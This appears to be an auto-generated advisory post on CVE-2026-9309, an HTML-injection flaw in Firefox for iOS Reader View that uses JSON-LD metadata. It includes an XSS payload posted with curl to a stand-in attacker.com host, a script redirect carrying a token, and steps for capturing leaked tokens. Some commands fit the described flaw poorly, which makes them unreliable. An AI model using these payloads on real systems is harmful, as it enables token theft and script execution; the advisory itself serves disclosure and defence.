Listen to this Post
CVE‑2026‑9309 is a vulnerability in the Reader View component of Firefox for iOS that stems from improper HTML tag escaping when processing JSON‑LD metadata. JSON‑LD is a structured data format used by web pages to embed machine‑readable information, such as s, authors, and descriptions. When Firefox for iOS loads a page that contains JSON‑LD data and the user switches to Reader View, the browser parses this metadata to enhance the reading experience. However, due to a failure to properly escape or sanitize HTML tags within the JSON‑LD content, an attacker can inject arbitrary markup. This injected markup is then interpreted by the Reader View engine instead of being treated as plain text, effectively breaking out of the intended data context and altering the behaviour of Reader View. The impact is not limited to visual changes; the same injection vector can be used to manipulate how the browser handles certain UI elements or internal navigation flows. Specifically, a maliciously crafted page can cause Reader View to leak sensitive URL parameters that belong to internal pages. These parameters may include session identifiers, authentication tokens, or other values that are normally not exposed to external origins. Once an attacker obtains those parameters, they can craft a request that targets an internal origin (e.g., about: pages, internal settings, or privileged web views). Because the leaked parameters are embedded in a context that the browser trusts, the attacker can achieve arbitrary JavaScript execution within that internal origin. This effectively bypasses the same‑origin policy (SOP) and allows the attacker to read local data, invoke internal APIs, or further escalate privileges. The vulnerability was introduced in an unspecified earlier version and remained present until it was addressed in Firefox for iOS version 151.2. No user interaction beyond visiting a malicious web page and activating Reader View is required. The root cause lies in the lack of output encoding for JSON‑LD strings that contain HTML‑special characters such as <, >, &, and quotes. A typical vulnerable code path might look like: `readerView.insertHTML(jsonldData)` without prior escaping. The fix in version 151.2 ensures that all JSON‑LD metadata is properly escaped using HTML entity encoding before being inserted into the DOM of Reader View, thereby neutralising any injected tags.
DailyCVE Form:
Platform: Firefox for iOS
Version: before 151.2
Vulnerability: Reader View XSS
Severity: Medium
date: 2026‑06‑01
Prediction: Patch already released
What Undercode Say:
Check Firefox for iOS version
defaults read org.mozilla.ios.Firefox BundleShortVersionString
Fetch a suspicious page and extract JSON‑LD metadata
curl -s https://example.com/malicious | grep -A5 '"@context": "http://schema.org"'
Test injection of HTML tags in JSON‑LD
curl -X POST -H "Content-Type: application/json" -d '{"Body":"<img src=x onerror=alert(1)>"}' https://attacker.com/poison
Simulate leak of internal URL parameters via Reader View
cat <<EOF > test.html
<script>
window.location = "internal://settings?token=SECRET";
</script>
EOF
Exploit:
- Attacker hosts a web page that includes JSON‑LD metadata containing malicious HTML tags, e.g.
"description": "<img src=x onerror=alert('XSS')>". - Victim opens the page in Firefox for iOS and activates Reader View.
- The unescaped HTML tags are injected into Reader View’s DOM, altering its behaviour.
- The injected script triggers the browser to leak internal URL parameters (e.g.,
?token=abc123). - Attacker captures the leaked parameters via a remote listener.
- Attacker constructs a request to an internal origin using the leaked parameters.
- Arbitrary JavaScript executes in the internal origin, compromising sensitive data.
Protection:
- Update Firefox for iOS to version 151.2 or later immediately.
- Disable Reader View for untrusted websites in Settings → Firefox → Reader View.
- Use a content‑blocking extension that filters JSON‑LD metadata.
- Monitor network traffic for unexpected `about:` or `internal:` requests.
Impact:
- Leakage of sensitive URL parameters (session tokens, API keys).
- Arbitrary JavaScript execution in internal origins.
- Bypass of the same‑origin policy (SOP) for internal pages.
- Potential access to local files or privileged browser APIs.
- Full compromise of the Firefox for iOS sandbox if escalated.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
